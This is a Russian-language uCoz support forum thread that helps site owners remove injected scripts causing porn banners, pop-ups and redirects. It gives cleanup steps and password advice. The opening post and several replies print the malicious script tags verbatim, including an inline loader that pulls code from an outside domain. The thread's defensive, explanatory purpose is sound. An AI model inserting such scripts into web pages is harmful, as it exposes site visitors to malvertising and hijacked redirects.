Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Если на вашем сайте появились порнобаннеры (порнобаннеры, всплывающая реклама, окна или переброс)
Если на вашем сайте появились порнобаннеры
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1 | 15:57:08
Если на вашем сайте постоянные перебросы на другие сайты или появляется куча всплывающих рекламных баннеров, порнобаннеров, то вы должны проверить код страниц на наличие следующих скриптов:

Код
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/hvuz2754blb414j/niucee.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/eipt4uu8dbovggv/niuggcee.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/1ca1t7akhf87zrc/flashsiteru.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/af6arwcjnknnb15/menu.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/ud3ne5xe8dcre8u/topbottom.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/kuejhhvopk6nw6z/mysql.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/tnwyduomjbcsxzm/opapo.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/207odofje1uzdl5/orororo.txt"></script>
<script language="JavaScript" src="http://gocash.ws/js/slider.php?id=51"></script>
<script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>
<script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/739tqn6t0d66blax8ijp5g164r61v4ut'></script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/98vihkxfbix863weu7zv9wqxjxhbbdh'></script>
<script type="text/javascript" src="http://nativevat.hol.es/rases.txt"></script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://tsingera.ru/5easame6c5z7eb11wv3tp0164r61v4ut'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/6mg4oc9iyoi50h5tcwiudp6yfoe9gnd5e53tyz991m51k05'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/9bg8m0fsumq6pg79dp5ikt8sy9lxik40i89gq7udb51xjt1'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/7s0qxmmi2365xqgf6si4b17klvgtdyvrm5ex2ij7pdg5jet'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8jqhrtj5gcy538xp6e6s7h8nepubdfejg5vjptg5p0eti11'></script>


Актуальные на данный момент и самые распространенные эти скрипты

Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://bobrilla.com/7h4p5qn4qhr8ee1ywr1nh01af3d31nbp'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://iqmasa.ru/6rzofz8uuc28ef8pehs6rx5nbidd8hra473w3yk0c1n9d39'></script>

Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://fasterdir.ru/8v0n2hh3me45jvyxrtdyc4164r61v4ut'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/739tqn6t0d66blax8ijp5g164r61v4ut'></script>


Код
<script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>


Код
<script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>


Код
<script language="JavaScript" src="http://gocash.ws/js/slider.php?id=51"></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobatori.com/6h3mo39hhqx8pibnjyshzo13skikuus5'></script>


Код
<script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8mi9nn0te6q68tjygr5vm573z85xk4lzw89gq7udb51xh8l'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://tsingera.ru/5easame6c5z7eb11wv3tp0164r61v4ut'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/6mg4oc9iyoi50h5tcwiudp6yfoe9gnd5e53tyz991m51k05'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/9bg8m0fsumq6pg79dp5ikt8sy9lxik40i89gq7udb51xjt1'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/7s0qxmmi2365xqgf6si4b17klvgtdyvrm5ex2ij7pdg5jet'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8jqhrtj5gcy538xp6e6s7h8nepubdfejg5vjptg5p0eti11'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://chicop.ru/68sb0mshp9b78t1epj44r8zi8bjocb9'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobmas.ru/s/948'></script>


Код

<script type="text/javascript">
  (function(w) {
  var script = document.createElement('script');
  var i = setInterval(function() {
  if (typeof w.document.body !== 'undefined') {
  script.src = 'http://knjjiiyqj.about-home.info' + '/?818010=LmcuKHw4NjU5MTM-KWdrbm5oaG0';
  w.document.body.appendChild(script);
  clearInterval(i);
  }
  }, 200);
})(window);
</script>
<script type="text/javascript">
  (function(w) {
  var script = document.createElement('script');
  var i = setInterval(function() {
  if (typeof w.document.body !== 'undefined') {
  script.src = 'http://knjjiiyqj.about-home.info' + '/?823389=KWApL3s_MTI-NjQ5LmBsaWlvb2U';
  w.document.body.appendChild(script);
  clearInterval(i);
  }
  }, 200);
})(window);
</script>



Как удалить:

1) Код как правило внедряется в шаблоны Страницы сайта. Модуль новости (все шаблоны) но могут быть варианты. Иногда код внедряется во все шаблоны сайта.
Прописывается в верхней части шаблона или в самом низу. Реже встречается в футере (глобальный блок Нижняя часть сайта)

2) Для удаления нужно воспользоваться функцией Быстрой замены. Для этого надо пройти в панель управления - Дизайн - Управление дизайном - Быстрая замена - В поле "Что заменить" вставляете скрипт (даже если внедрено много скриптов лучше удалять по одному) - Поле на что изменить оставляете пустым и производите замену во всех действующих модулях
Если скриптов много внедрено, можно попробовать многострочную замену по той же схеме
3) После очистки сайта от внедренного кода нужно обязательно сменить пароль uID профиля, которым администрируете сайт. Инструкция по изменению пароля находится тут //forum.ucoz.ru/forum/45-52299-1
4) Если после изменения uID пароля на новый сложный у вас снова и снова возникает проблема внедрения чужеродного кода, то выполните следующие инструкции:
1) создайте нового пользователя в панели управления сайтом: задайте ему Логин и сложнейший пароль
2) дайте созданному пользователю права администратора, а у бывшего uID профиля, которым администрировали сайт заберите права и переведите его в низшую группу
3) в общих настройках сайта поставьте старый Вид кнопки uID авторизации и далее администрируйте сайт локально
5) Если локальный способ администрирования для вас не подходит, то создайте в системе ещё один uID профиль, на котором не будет сайтов и прав управления ни одним из сайтов. И новый созданный профиль используйте для авторизации на сайтах системы uCoz с uID авторизацией. А uID профилем, которым вы администрируете сайт или сайты заходите только к себе на сайты и более никуда. И поставьте на uID пароль администратора сайта сложнейший пароль!
6) Заберите права доступа к админ бару другим администраторам и модераторам вашего сайта. не пускайте никого в панель управления сайтом
7) Будьте внимательны к письмам, которые приходят на вашу почту. Часто мошенники имитируют письма от вебсервиса uCoz, в которых просят вас пройти или верификацию или пройти по ссылкам, также просят ввод ваших данных (вебтоп пароль и пароль uID профиля или секретный вопрос и ответ). Если вы сомневаетесь в письме, которое вам пришло от имени сервиса, вы можете всегда спросить или на форуме в этой теме //forum.ucoz.ru/forum/45-46950-1 или перешлите его сразу на адрес abuse@ucoz.ru
Будьте всегда бдительны и следите за темой //forum.ucoz.ru/forum/45-35739-1


Если вы вообще ничего не поняли, но проблема появления всплывающих порнобаннеров и переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает (если есть переброс), а так же указать происходит это под логином или под гостем

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 61 | 22:11:31
Natali_SPb, тот что в подписи тоже заражен. его тоже чистить надо. эти коды //forum.ucoz.ru/forum/45-57475-1145861-16-1391445123 для очистки и сайта в подписи. у вас оба сайта одинаковым заражены. и не забудьте поменять пароль uid профиля обязательно

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Natali_SPb
Сообщений: 11
Репутация: 2

Сообщение # 62 | 22:17:09
Да... не успеваю добавлять ))) У меня несколько сайтов и на все "повесили" ))) Просто на двух я поправила по вашему примеру "быстрой заменой", а на одном ( на scalare-spb.com ) только вручную. Дак вот там-то осталось или нет? И где это видно кроме шаблонов...

Очень хочется уяснить, неужели при ручной правке остаются "пришельцы"... или только если не аккуратно удалять?

webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 63 | 22:22:28
Natali_SPb, сайт со скаляриями чистый

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Natali_SPb
Сообщений: 11
Репутация: 2

Сообщение # 64 | 22:25:27
Большое спасибо. smile

akka2100
Сообщений: 10
Репутация: 0

Сообщение # 65 | 06:38:22
Я нашел во что но не как не могу удалить. Как могли вставить столько вирусов, пароль очень сложный?


Добавлено (04 Фев 2014, 06:06:26)
---------------------------------------------
Вот еще код-вирусы которые не заменяются в быстрой замене .

Добавлено (04 Фев 2014, 06:21:48)
---------------------------------------------
Почему при просмотре всех модулей сайта, новости, доска объявлений, страницы не видно скрипов-вирусов а при просмотре в браузере (ctrl +U) всего кода сайта его видно? Где он может прятаться или в не активированных модулях?

Добавлено (04 Фев 2014, 06:38:22)
---------------------------------------------
Пример сайта где есть вирус sadik37.ucoz.ru. Код большой быстрой заменой не удаляется как в ручную удалить не пойму

есть сайт заработай vce-partnerki.blogspot.com
Miss_Esq
Сообщений: 13859
Репутация: 4159
Уровень замечаний:

Сообщение # 66 | 07:41:52
akka2100,
Цитата
Я нашел в .... у удалить
это стандартная реклама ..
Цитата
Вот еще ко ... строй замене .
это системный счётчик стастистики а не вирус, так и должно быть ...

Сообщение отредактировал Miss_Esq - Вторник, 04 Фев 2014, 07:43:58
Smith2007
Сообщений: 7
Репутация: 0

Сообщение # 67 | 08:49:51
webanet, зашел на свой сайт из под Ubuntu 12.04. Все работает нормально. Ни каких гиперссылок не появляется. Проблема в зараженной ОС Windows7.
Снес систему и переустановил на чистый HDD. Все работает нормально.
Спасибо за подсказку.

зы. в очередной раз убеждаюсь в "тяжелой болезни win*".
Лана_Светлая
Сообщений: 8
Репутация: 0

Сообщение # 68 | 17:11:11
Здравствуйте! Чищу-чищу от скриптов - они опять появляются... И быстрой заменой и вручную. Очистила модуль, перехожу к другому, возвращаюсь к первому - можно сначала начинать. Самостоятельно клонируется? Как избавиться? Заранее спасибо!
http://volgalux.ucoz.ru/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 69 | 17:21:08
Лана_Светлая, на данный момент указанный сайт чист. если вы продолжаете видеть левые баннеры, то вам стоит сбросить кеш. если после сброса будете видеть, то протестируйте в других браузерах. чтобы не иметь проблем в будущем читайте первое сообщение данной темы //forum.ucoz.ru/forum/45-57475-1093991-16-1380628628 и обязательно смените пароль uid профиля. инструкция по замене тут //forum.ucoz.ru/forum/45-52299-1

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
zvartnoz
Сообщений: 20
Репутация: 1

Сообщение # 70 | 11:15:29
очень полезная информация, помогла избавиться от всякого мусора, вдруг появившегося на сайте

Заходите в гости
http://yurpom24.ucoz.ru/
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 71 | 12:36:44
Лана_Светлая, webanet упустила, что вы удалили вредоносный код только в части шаблонов.

Воспользуйтесь быстрой заменой участков шаблона, для удаления сторонних скриптов:

Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/98vihkxfbix863weu7zv9wqxjxhbbdh'></script><script type="text/javascript" src="http://nativevat.hol.es/rases.txt"></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8mi9nn0te6q68tjygr5vm573z85xk4lzw89gq7udb51xh8l'></script>
<script type="text/javascript" src="http://pjatnuchanu.ucoz.ua/adblock.txt"></script>


Код виден на страницах - регистрации /index/3, Персональная станица пользователя /index/8-1, и других
sergio3627
Сообщений: 5
Репутация: 0

Сообщение # 72 | 18:10:59
Прошу помощи! Мой сайт seosprint-net.ucoz.ua
Ситуация такая, заходил неделю назад на свой сайт пару дней подрят и делал переходы по страницам сайта.
При переходе на другую страницу сайта открывалась левая страница в новой вкладке с какой то рекламой.
Сейчас всё нормально, всё прошло само, Я ничего не делал, но это всё как-то подозрительно.
Я просканировал свой сайт через проверку сайта на вирусы antivirus-alarm.ru
Проверка показала очень подозрительный код, скорее всего вирус:
<iframe height="0" width="0" frameborder="0" scrolling="no" src="http://htz-2.xstats.in/index.cnt?c[0]=ucoz_li"></iframe>
Название вируса Trojan.Iframe.BIM
Я искал решение проблемы, как написано было на форуме и нечего не нашёл.
Пароли у меня сложные, в браузере не сохраняю, антивирус имею, но он не показывает, что есть вирус.
Как мог попасть вирус, не могу понять.
Помогите решить проблему!
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 73 | 18:17:53
sergio3627, вредоносный код на сайте не обнаружен. если ваши онлайн сервисы что-то находят, то обращайтесь в тех.поддержку онлайн сервисов с запросом удаления результатов их сервиса с вашего сайта

в данном случае реакция на ифрейм подгрузки рекламы юкоз

для ознакомления читаем внимательно //forum.ucoz.ru/forum/45-47668-1

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
๑۩Kirill۩๑
Сообщений: 2
Репутация: -15

Сообщение # 74 | 14:02:37
Ссылка: http://goodtee.tk/

Проблема: На сайте внезапно стало много рекламы(Какая-то реклама раньше была, но у админов она не отображалась), а теперь чуть-ли не при каждом клике переводит на другие страницы(рекламные), а даже имея статус "Администратор" её меньше не стало. Я заметил на некоторых рекламах есть название "PopUnder".

Как справиться с незадачей?
сondor
Сообщений: 4661
Репутация: 1528

Сообщение # 75 | 14:17:35
๑۩Kirill۩๑, находим по всем шаблонам скрипт и удаляем:

Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/6mg4oc9iyoi50h5tcwiudp6yfoe9gnd5e53tyz991m51k05'></script>


Можно через быструю замену //forum.ucoz.ru/forum/24-31884-1
После чистки смените пароли //forum.ucoz.ru/forum/45-52299-1
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Если на вашем сайте появились порнобаннеры (порнобаннеры, всплывающая реклама, окна или переброс)
Поиск: